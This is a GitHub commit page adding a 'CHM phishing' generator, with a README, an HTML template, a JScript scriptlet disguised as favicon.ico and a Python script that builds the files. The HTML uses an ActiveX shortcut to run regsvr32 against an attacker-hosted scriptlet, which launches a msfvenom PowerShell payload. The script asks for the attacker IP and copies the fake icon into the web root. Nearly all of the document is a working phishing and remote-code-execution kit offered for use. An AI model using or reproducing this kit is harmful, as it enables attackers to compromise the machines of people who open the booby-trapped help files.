Skip to content

Commit 8bcccc3

Browse files
authored
Add files via upload
1 parent a8db081 commit 8bcccc3

File tree

4 files changed

+142
-0
lines changed

4 files changed

+142
-0
lines changed

chm钓鱼快速生成/REAME.md

+12
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
这是我研究了chm钓鱼所写出的,为了方便快速生成。将在file文件里面生成的start.html放入Easy CHM中生成对应的chm,将fanvicon.ico,放入
2+
你的apache目录,Linux的话他会自动帮你移动,windows下的话不会。
3+
chm钓鱼:https://422926799.github.io/2019/01/27/Chm-fishing/
4+
5+
By 九世 2019/1/27
6+
7+
8+
This is what I wrote about chm fishing, in order to facilitate the rapid generation. Put the start.html generated in the file file into Easy CHM to generate the corresponding chm, put fanvicon.ico,
9+
Your apache directory, Linux, he will automatically help you move, windows will not.
10+
Chm fishing: https://422926799.github.io/2019/01/27/Chm-fishing/
11+
12+
By IX 2019/1/27
+20
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
2+
<?XML version="1.0"?>
3+
<scriptlet>
4+
<registration
5+
progid="ShortJSRAT"
6+
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
7+
<!-- Learn from Casey Smith @subTee -->
8+
<script language="JScript">
9+
<![CDATA[
10+
"
11+
ps1 = "exp";
12+
$shell=new ActiveXObject("WScript.Shell")
13+
$shell.Run(ps1,0,true);
14+
]]>
15+
</script>
16+
</registration>
17+
</scriptlet>
18+
19+
20+

chm钓鱼快速生成/file/start.html

+13
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
2+
command exec
3+
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
4+
<PARAM name="Command" value="ShortCut">
5+
<PARAM name="Button" value="Bitmap::shortcut">
6+
<PARAM name="Item1" value=',regsvr32.exe,/u /n /s /i:http://127.0.0.1/favicon.ico scrobj.dll'>
7+
<PARAM name="Item2" value="273,1,1">
8+
</OBJECT>
9+
<SCRIPT>
10+
x.Click();
11+
</SCRIPT>
12+
</body></html>
13+

chm钓鱼快速生成/shengc.py

+97
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,97 @@
1+
'''
2+
#author:九世
3+
#time:2019/1/27
4+
'''
5+
6+
import os
7+
import platform
8+
9+
class Chm:
10+
def __init__(self,payload,payload2):
11+
self.payload=payload
12+
self.payload2=payload2
13+
14+
def remed(self):
15+
systems=platform.system()
16+
if systems=="Windows":
17+
id=1
18+
print('[!] system:{}'.format(systems))
19+
elif systems=="Linux":
20+
print('[!] system:{}'.format(systems))
21+
id=2
22+
23+
self.shengchen(id)
24+
def shengchen(self,id):
25+
xj=open('file/start.html','w')
26+
xj.close()
27+
xj2=open('file/favicon.ico','w')
28+
xj2.close()
29+
print(self.payload,file=open('file/start.html','a'))
30+
print(self.payload2,file=open('file/favicon.ico','a'))
31+
self.panduan(id)
32+
def panduan(self,id):
33+
if id==2:
34+
if os.path.exists('file/start.html'):
35+
print('[+] Found start.html')
36+
else:
37+
print('[-] Not Found start.html')
38+
39+
if os.path.exists('file/favicon.ico'):
40+
print('[+] Found favicon.ico')
41+
os.system('mv file/favicon.ico /var/www/html')
42+
print('[+] Found Apache /var/www/html')
43+
else:
44+
print('[-] Not Found favicon.ico')
45+
46+
else:
47+
if os.path.exists('file/start.html'):
48+
print('[+] Found start.html')
49+
else:
50+
print('[-] Not Found start.html')
51+
52+
if os.path.exists('file/favicon.ico'):
53+
print('[+] Found favicon.ico')
54+
else:
55+
print('[-] Not Found favicon.ico')
56+
57+
if __name__ == '__main__':
58+
print('[+] Chm fishing research:https://422926799.github.io/2019/01/27/Chm-fishing/\n[+] This tool will be used under Linux to move the automatically generated fanvicon.ico to /var/www/html\n[+] The first one will let you enter the IP of the attacker, and the second will input the powershell payload generated by msfvenom.')
59+
user=input('attack_IP:')
60+
user2=input('msfvenom_powershell_exp:')
61+
attack_payload='''<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
62+
command exec
63+
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
64+
<PARAM name="Command" value="ShortCut">
65+
<PARAM name="Button" value="Bitmap::shortcut">
66+
<PARAM name="Item1" value=',regsvr32.exe,/u /n /s /i:http://{}/favicon.ico scrobj.dll'>
67+
<PARAM name="Item2" value="273,1,1">
68+
</OBJECT>
69+
<SCRIPT>
70+
x.Click();
71+
</SCRIPT>
72+
</body></html>
73+
'''.format(user)
74+
75+
76+
sou_payload="""
77+
<?XML version="1.0"?>
78+
<scriptlet>
79+
<registration
80+
progid="ShortJSRAT"
81+
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
82+
<!-- Learn from Casey Smith @subTee -->
83+
<script language="JScript">
84+
<![CDATA[
85+
"""+""""
86+
ps1 = "{}";
87+
$shell=new ActiveXObject("WScript.Shell")
88+
$shell.Run(ps1,0,true);
89+
]]>
90+
</script>
91+
</registration>
92+
</scriptlet>
93+
94+
95+
""".format(user2)
96+
obj=Chm(payload=attack_payload,payload2=sou_payload)
97+
obj.remed()

0 commit comments

Comments
 (0)